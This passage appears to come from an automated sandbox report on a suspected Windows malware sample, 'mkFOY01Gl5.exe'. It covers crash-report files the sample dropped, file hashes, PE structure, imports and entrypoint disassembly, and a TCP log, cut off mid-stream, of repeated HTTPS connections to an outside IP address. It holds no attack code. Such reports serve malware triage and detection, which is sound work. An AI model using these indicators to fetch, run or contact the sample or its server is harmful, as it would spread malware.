      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="391586" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

      C:\ProgramData\Microsoft\Windows\WER\Temp\WERA935.tmp.dmp

      Download File
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:Mini DuMP crash report, 15 streams, Mon Jul 1 07:24:01 2024, 0x1205a4 type
      Category:dropped
      Size (bytes):101108
      Entropy (8bit):2.087840884203208
      Encrypted:false
      SSDEEP:384:AI5H5paX5X75HnEfEkxYaUCvZb9LaWQhLiyMDy3XO3yjC4Vq75Z6D1ubH3Pg3zIj:A8uZ5nEf7kWQL9OCpIj
      MD5:E63835EB24058CCE2709C6C3D1A04320
      SHA1:642C768FA1C31DB01ACFC1671702813DF072EF0C
      SHA-256:FABF541552024AA176A63EEDAD79BB608770C053CCE35C86AC9726043CF98A58
      SHA-512:4ACB13BDE6957BDF4F41AB28A6D9E5FF2B6B158A89F86AEAC70852C94C2221A6F2657B48D9B816518A6AE62B775DCF188A7F0B23D3F8F5D8C96EDE947BAD8F22
      Malicious:false
      Reputation:low
      Preview:MDMP..a..... ........Y.f.........................................#......d....J..........`.......8...........T............B...H..........(%...........'..............................................................................eJ.......'......GenuineIntel............T....... ...uY.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\ProgramData\Microsoft\Windows\WER\Temp\WERAA50.tmp.WERInternalMetadata.xml

      Download File
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):8294
      Entropy (8bit):3.6999052158755275
      Encrypted:false
      SSDEEP:192:R6l7wVeJot63sr9e6Y9v6thWXgmf811rprO89bI8Rsf2WYm:R6lXJa6cI6Y16tegmfERI8Kf2Q
      MD5:083EA18287B1CC5FCA85B385211A203C
      SHA1:D71C8757AF304C6ED61608C2246F18FCB3037DFA
      SHA-256:CA0BFD84475392D6B934F25A2E6BE63482E034F516D2847DC0734A642D784700
      SHA-512:9FE6C2E3B13E1FB88ED0889A2EE6B835A3568001BF5BCB7F1C9395FB118C27879657BA3CF3FFED9DA846C916826AA153E3A33C529D45DFECC18E0C3690441970
      Malicious:false
      Reputation:low
      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.7.6.<./.P.i.

      C:\ProgramData\Microsoft\Windows\WER\Temp\WERAA70.tmp.xml

      Download File
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):4628
      Entropy (8bit):4.448620318724153
      Encrypted:false
      SSDEEP:48:cvIwWl8zsyJg77aI9ROWpW8VYCYm8M4JfuAsQF6sCj+q8olVuQgLuOLuWrd:uIjfAI77v7VyJfuLtZvlgBukuWrd
      MD5:7FD1633C49059A3588F37F550D4A0872
      SHA1:5D9F8E7B6F335F4DE3531F4B7712EBF4A14E9878
      SHA-256:D70D2C34C160C62C389D15B4EFC4367A7E3834A609FFCC3CF0CEED92471FE5E1
      SHA-512:D3877FA69A7976DEAEC601B1454C4624D2D3B16697A1A7ED73554C5707EA21EB78C2D6463E7E1F1E270E4F41CB63B4BB65EBE11ECE9E30762C04456DF77E3F1D
      Malicious:false
      Reputation:low
      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="391586" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

      C:\Windows\appcompat\Programs\Amcache.hve

      Download File
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:MS Windows registry file, NT/2000 or above
      Category:dropped
      Size (bytes):1835008
      Entropy (8bit):4.4251801333705565
      Encrypted:false
      SSDEEP:6144:BSvfpi6ceLP/9skLmb0OTyWSPHaJG8nAgeMZMMhA2fX4WABlEnNl0uhiTw:YvloTyW+EZMM6DFyD03w
      MD5:A2A5BF6F5D9FBB49F263B40CF802033B
      SHA1:E85AF25CFFD99F90D093D9C9437DBD2C3734D855
      SHA-256:A096EC5DCD763AD9224659C670FEFE9BEF2389CDD582C56601EB59B808622998
      SHA-512:0BF4E231F06EE1D21E7C90417F34715AB0DD06DFB55DBFC9075B1182FED169EC2236A171D0E3D65C15E65E40D3A8F24DE551E486DD51FD0740A59DE7F99EB874
      Malicious:false
      Reputation:low
      Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

      Static File Info

      General

      File type:PE32 executable (console) Intel 80386, for MS Windows
      Entropy (8bit):7.661614937929796
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.96%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:mkFOY01Gl5.exe
      File size:528'384 bytes
      MD5:0309dd0131150796ea99b30a62194fae
      SHA1:2df6e334708eae810a74b844fd57e18e9fdc34cd
      SHA256:07c09ba5a84f619e5b83a54298ffc58d20b00f14399c7a94b7f02b70efc60f35
      SHA512:3d4e5a0718d04fee92d8040880b631107d1e23a6b3bce430d58769179af999c28b99e50c5cd45f283339f7bbb24ffacbf601a5447edb12e28da4517fbfa282e8
      SSDEEP:12288:YwFARGxNB+mIuUOI+J0X6KALNGK34y1sB2Y+Jg4c:Yj4xb+mrZj1VHSB2Y6d
      TLSH:6FB4F10275C08072D573113605F8DBB86E3EB9704F6599CF97941B7E8F202E2FA35A6A
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........x...+...+...+z..*...+z..*...+z..*...+k\.*...+k\.*...+z..*...+...+(..+k\.*...+Z_.*...+Z_.*...+Z_.*...+Rich...+........PE..L..

      File Icon

      Icon Hash:00928e8e8686b000

      Static PE Info

      General

      Entrypoint:0x407452
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows cui
      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Time Stamp:0x66810EB7 [Sun Jun 30 07:52:23 2024 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:6
      OS Version Minor:0
      File Version Major:6
      File Version Minor:0
      Subsystem Version Major:6
      Subsystem Version Minor:0
      Import Hash:bea8657593f34831fef16a15915f462d

      Entrypoint Preview

      Instruction
      call 00007FCFAC6482AEh
      jmp 00007FCFAC647969h
      push ebp
      mov ebp, esp
      mov eax, dword ptr [ebp+08h]
      push esi
      mov ecx, dword ptr [eax+3Ch]
      add ecx, eax
      movzx eax, word ptr [ecx+14h]
      lea edx, dword ptr [ecx+18h]
      add edx, eax
      movzx eax, word ptr [ecx+06h]
      imul esi, eax, 28h
      add esi, edx
      cmp edx, esi
      je 00007FCFAC647B0Bh
      mov ecx, dword ptr [ebp+0Ch]
      cmp ecx, dword ptr [edx+0Ch]
      jc 00007FCFAC647AFCh
      mov eax, dword ptr [edx+08h]
      add eax, dword ptr [edx+0Ch]
      cmp ecx, eax
      jc 00007FCFAC647AFEh
      add edx, 28h
      cmp edx, esi
      jne 00007FCFAC647ADCh
      xor eax, eax
      pop esi
      pop ebp
      ret
      mov eax, edx
      jmp 00007FCFAC647AEBh
      push esi
      call 00007FCFAC648584h
      test eax, eax
      je 00007FCFAC647B12h
      mov eax, dword ptr fs:[00000018h]
      mov esi, 004801F0h
      mov edx, dword ptr [eax+04h]
      jmp 00007FCFAC647AF6h
      cmp edx, eax
      je 00007FCFAC647B02h
      xor eax, eax
      mov ecx, edx
      lock cmpxchg dword ptr [esi], ecx
      test eax, eax
      jne 00007FCFAC647AE2h
      xor al, al
      pop esi
      ret
      mov al, 01h
      pop esi
      ret
      push ebp
      mov ebp, esp
      cmp dword ptr [ebp+08h], 00000000h
      jne 00007FCFAC647AF9h
      mov byte ptr [004801F4h], 00000001h
      call 00007FCFAC647DAAh
      call 00007FCFAC64AB17h
      test al, al
      jne 00007FCFAC647AF6h
      xor al, al
      pop ebp
      ret
      call 00007FCFAC6542E4h
      test al, al
      jne 00007FCFAC647AFCh
      push 00000000h
      call 00007FCFAC64AB1Eh
      pop ecx
      jmp 00007FCFAC647ADBh
      mov al, 01h
      pop ebp
      ret
      push ebp
      mov ebp, esp
      cmp byte ptr [004801F5h], 00000000h
      je 00007FCFAC647AF6h
      mov al, 01h

      Data Directories

      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x2f5c00x50.rdata
      IMAGE_DIRECTORY_ENTRY_IMPORT0x2f6100x3c.rdata
      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC0x810000x1d1c.reloc
      IMAGE_DIRECTORY_ENTRY_DEBUG0x2d8680x1c.rdata
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2d7a80x40.rdata
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IAT0x250000x164.rdata
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

      Sections

      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
      .text0x10000x22e060x23000bcfd4743919a7287f45509a4c87268d7False0.5696707589285714data6.6395354102405175IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .BsS0x240000xe1d0x1000cd00c5aad3fabcefbb666ed38bc94e75False0.571044921875data5.9592480997149915IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .rdata0x250000xae340xb000269cf7a3d1bfd5dc301125bba1094a1eFalse0.42329545454545453data5.043395030886215IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .data0x300000x50cf40x4fe0020ba1805648860606c3ba6a2c47c9c18False0.9885318857589984data7.990757511119703IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .reloc0x810000x1d1c0x1e001fc36b079fe1a28d899aecb42986d0b4False0.76484375data6.493243062616553IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

      Imports

      DLLImport
      USER32.dllOffsetRect
      KERNEL32.dllCreateFileW, HeapSize, GetProcessHeap, SetStdHandle, WaitForSingleObject, CreateThread, VirtualAlloc, GetModuleHandleA, GetProcAddress, GetConsoleWindow, CloseHandle, WaitForSingleObjectEx, GetCurrentThreadId, GetExitCodeThread, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, QueryPerformanceCounter, ReleaseSRWLockExclusive, WakeAllConditionVariable, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetStringTypeW, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, SetEnvironmentVariableW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, GetFileType, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW

      Exports

      NameOrdinalAddress
      IUAhsiuchniuohAIU10x424d00

      Network Behavior

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Jul 1, 2024 09:23:35.287076950 CEST49704443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:35.287127018 CEST44349704188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:35.287193060 CEST49704443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:35.289505005 CEST49704443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:35.289526939 CEST44349704188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:51.063465118 CEST44349704188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:51.063615084 CEST49704443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:51.067439079 CEST49704443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:51.067455053 CEST44349704188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:51.067749023 CEST44349704188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:51.120342016 CEST49704443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:51.120362997 CEST49704443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:51.120522976 CEST44349704188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:51.507936001 CEST44349704188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:51.508028984 CEST44349704188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:51.508122921 CEST49704443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:51.510570049 CEST49704443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:51.510600090 CEST44349704188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:51.510615110 CEST49704443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:51.510622025 CEST44349704188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:51.516469002 CEST49707443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:51.516520977 CEST44349707188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:51.516696930 CEST49707443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:51.517065048 CEST49707443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:51.517074108 CEST44349707188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:52.250397921 CEST44349707188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:52.250524044 CEST49707443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:52.252046108 CEST49707443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:52.252053976 CEST44349707188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:52.252305984 CEST44349707188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:52.255815029 CEST49707443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:52.255844116 CEST49707443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:52.255911112 CEST44349707188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:52.692200899 CEST44349707188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:52.692240953 CEST44349707188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:52.692274094 CEST44349707188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:52.692332029 CEST49707443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:52.692339897 CEST44349707188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:52.692382097 CEST49707443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:52.692385912 CEST44349707188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:52.692420006 CEST44349707188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:52.692449093 CEST44349707188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:52.692497969 CEST49707443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:52.692502975 CEST44349707188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:52.692573071 CEST49707443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:52.692744970 CEST44349707188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:52.692888975 CEST44349707188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:52.693026066 CEST49707443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:52.693032026 CEST44349707188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:52.735049009 CEST49707443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:52.735059023 CEST44349707188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:52.781858921 CEST49707443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:52.784363985 CEST44349707188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:52.784504890 CEST44349707188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:52.784533978 CEST44349707188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:52.784558058 CEST44349707188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:52.784569979 CEST49707443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:52.784578085 CEST44349707188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:52.784621000 CEST49707443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:52.784720898 CEST44349707188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:52.784770966 CEST49707443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:52.785049915 CEST49707443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:52.785063982 CEST44349707188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:52.785087109 CEST49707443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:52.785094976 CEST44349707188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:52.822515011 CEST49708443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:52.822570086 CEST44349708188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:52.822642088 CEST49708443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:52.822978020 CEST49708443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:52.822998047 CEST44349708188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:53.292536974 CEST44349708188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:53.292622089 CEST49708443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:53.294410944 CEST49708443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:53.294428110 CEST44349708188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:53.294707060 CEST44349708188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:53.295975924 CEST49708443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:53.296132088 CEST49708443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:53.296160936 CEST44349708188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:53.726450920 CEST44349708188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:53.726541996 CEST44349708188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:53.726609945 CEST49708443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:53.726772070 CEST49708443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:53.726797104 CEST44349708188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:53.775541067 CEST49709443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:53.775573969 CEST44349709188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:53.775713921 CEST49709443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:53.776020050 CEST49709443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:53.776030064 CEST44349709188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:54.296291113 CEST44349709188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:54.296561003 CEST49709443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:54.297971010 CEST49709443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:54.297980070 CEST44349709188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:54.298336029 CEST44349709188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:54.299654007 CEST49709443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:54.299787998 CEST49709443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:54.299808979 CEST44349709188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:54.299863100 CEST49709443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:54.299869061 CEST44349709188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:54.727808952 CEST44349709188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:54.727890015 CEST44349709188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:54.728008032 CEST49709443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:54.728028059 CEST49709443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:54.931252003 CEST49711443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:54.931314945 CEST44349711188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:54.931523085 CEST49711443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:54.931829929 CEST49711443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:54.931838036 CEST44349711188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:55.410425901 CEST44349711188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:55.410516977 CEST49711443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:55.411695004 CEST49711443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:55.411726952 CEST44349711188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:55.411993980 CEST44349711188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:55.413160086 CEST49711443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:55.413330078 CEST49711443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:55.413369894 CEST44349711188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:55.413455963 CEST49711443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:55.413475037 CEST44349711188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:56.237123966 CEST44349711188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:56.237222910 CEST44349711188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:56.237431049 CEST49711443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:56.237466097 CEST49711443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:56.329623938 CEST49714443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:56.329658985 CEST44349714188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:56.329731941 CEST49714443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:56.330199957 CEST49714443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:56.330214024 CEST44349714188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:56.801548004 CEST44349714188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:56.801645041 CEST49714443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:56.802887917 CEST49714443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:56.802898884 CEST44349714188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:56.803142071 CEST44349714188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:56.810775042 CEST49714443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:56.810842991 CEST49714443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:56.810893059 CEST44349714188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:57.184555054 CEST44349714188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:57.184659004 CEST44349714188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:57.184762001 CEST49714443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:57.184812069 CEST49714443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:57.184839964 CEST44349714188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:57.204365969 CEST49716443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:57.204401016 CEST44349716188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:57.204499960 CEST49716443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:57.205003023 CEST49716443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:57.205014944 CEST44349716188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:57.678580999 CEST44349716188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:57.678715944 CEST49716443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:57.680118084 CEST49716443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:57.680129051 CEST44349716188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:57.680368900 CEST44349716188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:57.689659119 CEST49716443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:57.689759016 CEST49716443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:57.689768076 CEST44349716188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:58.337007046 CEST44349716188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:58.337086916 CEST44349716188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:58.337819099 CEST49716443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:58.337960958 CEST49716443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:58.337971926 CEST44349716188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:58.772373915 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:58.772414923 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:58.772597075 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:58.772937059 CEST49719443192.168.2.5188.114.96.3
